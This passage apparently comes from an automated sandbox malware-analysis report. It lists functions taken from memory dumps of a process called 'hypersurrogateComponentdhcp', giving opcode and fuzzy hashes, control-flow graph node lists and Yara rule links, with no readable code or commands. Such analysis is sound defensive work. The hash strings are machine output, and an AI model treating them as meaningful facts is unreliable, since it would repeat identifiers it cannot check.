                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: d51ba8569b498b40f183e2556bd96add0473010af89c80597fa3f81a005c4c25
                                                                                                                                                                          • Instruction ID: 40e0c0ee2887bf36618c4c90670f30f880e8b942033ac5fa20a40b3d7a3965c0
                                                                                                                                                                          • Opcode Fuzzy Hash: d51ba8569b498b40f183e2556bd96add0473010af89c80597fa3f81a005c4c25
                                                                                                                                                                          • Instruction Fuzzy Hash: AE516971E0965E8FDB59DB98C4B45FEB7B1FF54304F1540BAC01AA72D2CA346A05CB41
                                                                                                                                                                          Function 00007FFD9BF7A748 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1465 7ffd9bf7a748-7ffd9bf7a763 call 7ffd9bf76b10 1468 7ffd9bf7a768-7ffd9bf7a793 1465->1468 1472 7ffd9bf7a7bc-7ffd9bf7a7c2 1468->1472 1473 7ffd9bf7a7c9-7ffd9bf7a7cf 1472->1473 1474 7ffd9bf7a7d1-7ffd9bf7a7d6 1473->1474 1475 7ffd9bf7a795-7ffd9bf7a7ae 1473->1475 1478 7ffd9bf7a6c3-7ffd9bf7a708 1474->1478 1479 7ffd9bf7a7dc-7ffd9bf7a7dd 1474->1479 1476 7ffd9bf7a7b4-7ffd9bf7a7b9 1475->1476 1477 7ffd9bf7a8a5-7ffd9bf7a8b5 1475->1477 1476->1472 1486 7ffd9bf7a8b8-7ffd9bf7a906 1477->1486 1487 7ffd9bf7a8b7 1477->1487 1478->1473 1484 7ffd9bf7a70e-7ffd9bf7a714 1478->1484 1481 7ffd9bf7a7e0-7ffd9bf7a7e8 1479->1481 1485 7ffd9bf7a7ea-7ffd9bf7a811 call 7ffd9bf76b10 1481->1485 1488 7ffd9bf7a716 1484->1488 1489 7ffd9bf7a6c5-7ffd9bf7a89d 1484->1489 1501 7ffd9bf7a907 1486->1501 1487->1486 1493 7ffd9bf7a73f-7ffd9bf7a746 1488->1493 1489->1477 1493->1465 1494 7ffd9bf7a718-7ffd9bf7a731 1493->1494 1494->1477 1497 7ffd9bf7a737-7ffd9bf7a73c 1494->1497 1497->1493 1501->1501
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: e68df64182696a14e525e0ab367781829a3e14cbbd8272e1625a4cb7efcf36a5
                                                                                                                                                                          • Instruction ID: 5c33fb0941ef08554d1844a412c175975a00e0e27dd6dcab44f9a8d4543b2ed6
                                                                                                                                                                          • Opcode Fuzzy Hash: e68df64182696a14e525e0ab367781829a3e14cbbd8272e1625a4cb7efcf36a5
                                                                                                                                                                          • Instruction Fuzzy Hash: C7515D71E0964E8FDB59DF98C4A05ADB7B1EF54300F1242FAC01AD72A6DA35A902CB50
                                                                                                                                                                          Function 00007FFD9BBBE248 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1502 7ffd9bbbe248-7ffd9bbbe253 call 7ffd9bbba508 1504 7ffd9bbbe258-7ffd9bbbe283 1502->1504 1508 7ffd9bbbe2ac-7ffd9bbbe2b2 1504->1508 1509 7ffd9bbbe2b9-7ffd9bbbe2bf 1508->1509 1510 7ffd9bbbe285-7ffd9bbbe29e 1509->1510 1511 7ffd9bbbe2c1-7ffd9bbbe2c6 1509->1511 1512 7ffd9bbbe395-7ffd9bbbe3a5 1510->1512 1513 7ffd9bbbe2a4-7ffd9bbbe2a9 1510->1513 1514 7ffd9bbbe2cc-7ffd9bbbe301 call 7ffd9bbba508 1511->1514 1515 7ffd9bbbe1b3-7ffd9bbbe1f8 1511->1515 1521 7ffd9bbbe3a8-7ffd9bbbe3f6 1512->1521 1522 7ffd9bbbe3a7 1512->1522 1513->1508 1515->1509 1519 7ffd9bbbe1fe-7ffd9bbbe204 1515->1519 1523 7ffd9bbbe206 1519->1523 1524 7ffd9bbbe1b5-7ffd9bbbe38d 1519->1524 1537 7ffd9bbbe3f7 1521->1537 1522->1521 1528 7ffd9bbbe22f-7ffd9bbbe236 1523->1528 1524->1512 1530 7ffd9bbbe208-7ffd9bbbe221 1528->1530 1531 7ffd9bbbe238-7ffd9bbbe243 1528->1531 1530->1512 1534 7ffd9bbbe227-7ffd9bbbe22c 1530->1534 1534->1528 1537->1537
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: 0aaae03e718f583427f0c7963428a16c6b89ce0e5f51506d06f1cfc06dd1adea
                                                                                                                                                                          • Instruction ID: 96d3903a319af69570b31f8d1e7c0c71861a7c1aef3399e6326a294236267570
                                                                                                                                                                          • Opcode Fuzzy Hash: 0aaae03e718f583427f0c7963428a16c6b89ce0e5f51506d06f1cfc06dd1adea
                                                                                                                                                                          • Instruction Fuzzy Hash: DF516171E0961E8FEB99DB94C4655BDB7B1FF58304F1144BAD01AE72E2CA346A01CF40
                                                                                                                                                                          Function 00007FFD9BF72C58 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: 91ba68faeefc661ee08aa2eb32ba81ecc2f99de9a74b4c2a5ea83faf1b97caa1
                                                                                                                                                                          • Instruction ID: f6dcd5d124d80b39a53375d6ca0ad569a85590b11bcb8227cc01485ed4bda1f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 91ba68faeefc661ee08aa2eb32ba81ecc2f99de9a74b4c2a5ea83faf1b97caa1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D516D31E0A50E8FDB59DFD8C4A49FDB7B1EF59300F1141BAC41AE72A6CA356A45CB40
                                                                                                                                                                          Function 00007FFD9BBBBC22 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: i2_H
                                                                                                                                                                          • API String ID: 0-94494290
                                                                                                                                                                          • Opcode ID: 1d6f4bf90211da1bcdfeeb6dcd09cc48cab55d1fc12c73923f6d43106bb39b14
                                                                                                                                                                          • Instruction ID: c20ee35efc054c4bf4ce5dd3b3b9d477a06a10c8cb566b8e517de8a057d4dfe3
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6f4bf90211da1bcdfeeb6dcd09cc48cab55d1fc12c73923f6d43106bb39b14
                                                                                                                                                                          • Instruction Fuzzy Hash: 3921CB71A1551D9FDFA8EB58C4A5AEDB7B1FF68304F0101BE900EE32A1CE75A9418F40
                                                                                                                                                                          Function 00007FFD9BBB3580 Relevance: .7, Instructions: 653COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e7f5522750e5e3a4cbd1913758c2104690e956ee079a5e2ddd4ce64c7cea7890
                                                                                                                                                                          • Instruction ID: 521d502dfa12dcb2879ef96396dda037ffb1a05f2789e0a4986ee90ff051561c
                                                                                                                                                                          • Opcode Fuzzy Hash: e7f5522750e5e3a4cbd1913758c2104690e956ee079a5e2ddd4ce64c7cea7890
                                                                                                                                                                          • Instruction Fuzzy Hash: 9622A530B19A1D8FDBA8DB48C8A5A6977E2FF54304B5141BAD04EC72E2DE24ED45CF81
                                                                                                                                                                          Function 00007FFD9BBBE4AF Relevance: .4, Instructions: 425COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 64f8bb10d8adfd97cf15ae668baa81610a9d531699a3fa4e4c702ebec88a33ce
                                                                                                                                                                          • Instruction ID: 544a8c04fb54448edf65cbd83b89e873022b5ef57af01904f5fb33d3b2108d05
                                                                                                                                                                          • Opcode Fuzzy Hash: 64f8bb10d8adfd97cf15ae668baa81610a9d531699a3fa4e4c702ebec88a33ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 49F1D630619A598FEB99CF58C4E06B537A1FF44304F5545BDC84A8B6ABCA38F982CB41
                                                                                                                                                                          Function 00007FFD9BBB585F Relevance: .4, Instructions: 424COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 30c492db9fbc4fa6a2f57e356203a79dc0d16087dac5837d777d8d76c75f169b
                                                                                                                                                                          • Instruction ID: 10f9bfb25285f8e6eb02e0c5bf835aa1127ec7f0108a8bcd8fa7a842495385dd
                                                                                                                                                                          • Opcode Fuzzy Hash: 30c492db9fbc4fa6a2f57e356203a79dc0d16087dac5837d777d8d76c75f169b
                                                                                                                                                                          • Instruction Fuzzy Hash: 77F1D13061955A8FEB68CF58C4F06B537A1FF45304F5541BDC88A8B2DACA78E981CB42
                                                                                                                                                                          Function 00007FFD9BF73F11 Relevance: .4, Instructions: 414COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c1f45a25e3a91bb61b182dea8a8223da640bc654b7aa14cda2f4d72035df274c
                                                                                                                                                                          • Instruction ID: 9294ff23e87102022ed70debf1cad2afdfd41892e18291e4cabb58e6cc20225f
                                                                                                                                                                          • Opcode Fuzzy Hash: c1f45a25e3a91bb61b182dea8a8223da640bc654b7aa14cda2f4d72035df274c
                                                                                                                                                                          • Instruction Fuzzy Hash: B5D1E230B1EA0A4FD379DF68D4A157977E1FF54300B1146BDC49EC3AA2DA2AF9428741
                                                                                                                                                                          Function 00007FFD9BBB68A1 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 441647e7495491494746f8a906549be3c13a9f80cd531b0c8d86eb17a5b58a74
                                                                                                                                                                          • Instruction ID: 7de888088dd8dad7179f4837143f9aa42908f621a2537cd5503eeba4fb616b41
                                                                                                                                                                          • Opcode Fuzzy Hash: 441647e7495491494746f8a906549be3c13a9f80cd531b0c8d86eb17a5b58a74
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FD1D130A0EA1A4FD778DBA8D4A1576B7A1FF44308B11457EC48B836E2DA29FD42CB41
                                                                                                                                                                          Function 00007FFD9BF700C5 Relevance: .4, Instructions: 363COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 668e73a6e585ce87c463cc4336b48a30cb27c9eeece09cada9b7313dcbd55a43
                                                                                                                                                                          • Instruction ID: 49aa8d4ce5aa81318854357114c4e221ae66eba75631305894fa3b7db3d6bb88
                                                                                                                                                                          • Opcode Fuzzy Hash: 668e73a6e585ce87c463cc4336b48a30cb27c9eeece09cada9b7313dcbd55a43
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F41F433B0E61B9BFB757FF8A4B18F86350DF00B54B0603B6D49E860E68D4BA9550685
                                                                                                                                                                          Function 00007FFD9BF7A9BF Relevance: .4, Instructions: 362COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f48a06064cb5f7b76705023c9fe7fcf9fa29aa14ca1cee82a2a678c3e1b85096
                                                                                                                                                                          • Instruction ID: 726da64021500046d30681d59e9ea6d86ad9b265e99bd185c879efabbd68e46d
                                                                                                                                                                          • Opcode Fuzzy Hash: f48a06064cb5f7b76705023c9fe7fcf9fa29aa14ca1cee82a2a678c3e1b85096
                                                                                                                                                                          • Instruction Fuzzy Hash: 71D1D23061995A8FEB59CF48C0E05B137A1FF48311B6646FDC84B8B69BD639F981CB81
                                                                                                                                                                          Function 00007FFD9BBBE4CF Relevance: .3, Instructions: 335COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 69122de21eda5b8e5687670b8d10db2eb00d5bec03d6f49a71173afe7631edf0
                                                                                                                                                                          • Instruction ID: 329933f32191f4fc970ef996bdbc3fad586eb6f8ab8fdc7d4a53d62a6d57ad6a
                                                                                                                                                                          • Opcode Fuzzy Hash: 69122de21eda5b8e5687670b8d10db2eb00d5bec03d6f49a71173afe7631edf0
                                                                                                                                                                          • Instruction Fuzzy Hash: C1C1B330619A698FEB5DCF44C4E45B237A1FF45304B5549BDC84B8B6ABCA38F582CB41
                                                                                                                                                                          Function 00007FFD9BBB587F Relevance: .3, Instructions: 335COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 49da38ba0872afb596ca9c76b6cf112d77b21359ce919bfbe904ea13ca92efea
                                                                                                                                                                          • Instruction ID: fcfa4cf494655c106c209e69539621faec65c89d85d6bd64a27b587cf50aafab
                                                                                                                                                                          • Opcode Fuzzy Hash: 49da38ba0872afb596ca9c76b6cf112d77b21359ce919bfbe904ea13ca92efea
                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC1E13061A55A8BEB29CF58C0F05B637A1FF45308B5545BDC88B8B6DBCA78F581CB42
                                                                                                                                                                          Function 00007FFD9BF72EEF Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 381859be3fd02235c34fea0f53e9e5c5841fe8bbdd03a13a69421757f5d0b0ed
                                                                                                                                                                          • Instruction ID: e6bdd0f480ffb4f001decd194a0c005284883093464efeed009ca9cf924cdcc3
                                                                                                                                                                          • Opcode Fuzzy Hash: 381859be3fd02235c34fea0f53e9e5c5841fe8bbdd03a13a69421757f5d0b0ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1043061A54A9BEB2DCF48D4E05B137A1FF45300B5146FDC84B8B69BDA39F686CB81
                                                                                                                                                                          Function 00007FFD9BF7A9DF Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 626a04c611a63e216d94911d7f25c2a5c1e130fa55dbed9f954da7085a140f0d
                                                                                                                                                                          • Instruction ID: dfcb0d2d9111cd85ac946290a7ef57c086d84c805f106130c1aa71b793bb8633
                                                                                                                                                                          • Opcode Fuzzy Hash: 626a04c611a63e216d94911d7f25c2a5c1e130fa55dbed9f954da7085a140f0d
                                                                                                                                                                          • Instruction Fuzzy Hash: E5C1C23061954A8BEB2DCF58D0E05B137A1FF45301B6646FDC84B8B69BDA39F981CB81
                                                                                                                                                                          Function 00007FFD9BBB5112 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1a8e0b46644605a1699b5336d76d5e38c735857abd70153dc5f034bc98fbf04c
                                                                                                                                                                          • Instruction ID: 3485f86ad4d5670817a8662377135eb5fafebc8895c614bb520808cb6a041a13
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8e0b46644605a1699b5336d76d5e38c735857abd70153dc5f034bc98fbf04c
                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1F130B0AA4A8FE759DB68C0B16A5B7A1FF18304F5541BDC04EC7BD6CB68B951CB81
                                                                                                                                                                          Function 00007FFD9BF77C37 Relevance: .3, Instructions: 313COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1c44090bbe402ad0844c5717a0c1e21a98a6b7227cc34e62d63d54bd1cef1095
                                                                                                                                                                          • Instruction ID: 126fe9106fb62c09299146f491ea48af9809cf7904268ec370f018212e1f6e1e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c44090bbe402ad0844c5717a0c1e21a98a6b7227cc34e62d63d54bd1cef1095
                                                                                                                                                                          • Instruction Fuzzy Hash: CE319012F1E19B86F6396AA464F15B866D0DF15210F1B07FAD48E870E6CC2FAE445382
                                                                                                                                                                          Function 00007FFD9BBBDDBA Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 660b735bbc1f2f48b50caa6003278573d27986b8a8442e6176166a4a5423c7db
                                                                                                                                                                          • Instruction ID: 1b65cc1b08422de5eb73b8f978e77d69b210b60a6e5d6232272418dd89dc4424
                                                                                                                                                                          • Opcode Fuzzy Hash: 660b735bbc1f2f48b50caa6003278573d27986b8a8442e6176166a4a5423c7db
                                                                                                                                                                          • Instruction Fuzzy Hash: 6EB11630B0EA4A4FEB59DB68C0A16A5B7A1FF15304F4545B9C04EC7AE7DB28F951CB80
                                                                                                                                                                          Function 00007FFD9BF70167 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f7816cf5e159f7cae747d0d468aa85bb539304b7220c03e1891c70dc761d5bee
                                                                                                                                                                          • Instruction ID: 58f4c299542e09bc7fbb9f5e2f42edd5fcee8b8f8551a97c61d17554ecf4271f
                                                                                                                                                                          • Opcode Fuzzy Hash: f7816cf5e159f7cae747d0d468aa85bb539304b7220c03e1891c70dc761d5bee
                                                                                                                                                                          • Instruction Fuzzy Hash: 2121DB23F0F69B8BFB756EF854F18F85650DF10A60B0A03FAD49E870E2CC4E69555286
                                                                                                                                                                          Function 00007FFD9BF7A2CA Relevance: .3, Instructions: 297COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5918355145e3452dc85d80c946d2130d159751e1e92c5f1b86ec75fec6523632
                                                                                                                                                                          • Instruction ID: c429607e6f492569703994b97d063ea24150abde386afc3f11dda686c1e200cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 5918355145e3452dc85d80c946d2130d159751e1e92c5f1b86ec75fec6523632
                                                                                                                                                                          • Instruction Fuzzy Hash: E7B1F430A0DA4E8FE759DF68C0A06A0B7A1FF14300F5642F9C04EC7A96CB29F951CB91
                                                                                                                                                                          Function 00007FFD9BBBC1C0 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f94db8ba07dcfdffba0cedcd5a18bc9c10b4155216a4898b82b8658148e5b9bd
                                                                                                                                                                          • Instruction ID: 4b2b4a097c077cbbe3461ff0646f637ae57ccf4f17720086134f62fb09d18c50
                                                                                                                                                                          • Opcode Fuzzy Hash: f94db8ba07dcfdffba0cedcd5a18bc9c10b4155216a4898b82b8658148e5b9bd
                                                                                                                                                                          • Instruction Fuzzy Hash: D7919230B18A1D8FDB58DB58C899AB9B3E2FF59314B5541A9D04EC72A6CA31EC42CB40
                                                                                                                                                                          Function 00007FFD9BF72ECF Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
